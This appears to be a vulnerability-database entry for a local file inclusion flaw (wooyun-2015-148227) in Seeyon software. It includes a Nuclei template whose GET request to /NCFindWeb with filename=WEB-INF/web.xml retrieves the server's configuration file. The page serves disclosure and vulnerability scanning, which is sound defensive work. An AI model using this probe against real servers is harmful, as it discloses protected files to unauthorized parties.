wooyun-2015-148227: Seeyon WooYun - Local File Inclusion

日期: 2025-08-01 | 影响软件: Seeyon WooYun | POC: 已公开

漏洞描述

Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker via local file inclusion.

PoC代码[已公开]

id: wooyun-2015-148227

info:
  name: Seeyon WooYun - Local File Inclusion
  author: princechaddha
  severity: high
  description: Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker via local file inclusion.
  reference:
    - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: seeyon,wooyun,lfi,zhiyuan,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<servlet-name>NCInvokerServlet</servlet-name>"
        part: body

      - type: word
        part: header
        words:
          - "application/xml"
# digest: 4b0a00483046022100fdd75ceb80b6575dce3d4c453b9539b2b314cf4308ed27399854f5d6560e8723022100b90357f2779da392535fe69e16f0ac337c20a61ea73b744735e6036a5ff61a73:922c64590222798bb761d5b6d8e72950

相关漏洞推荐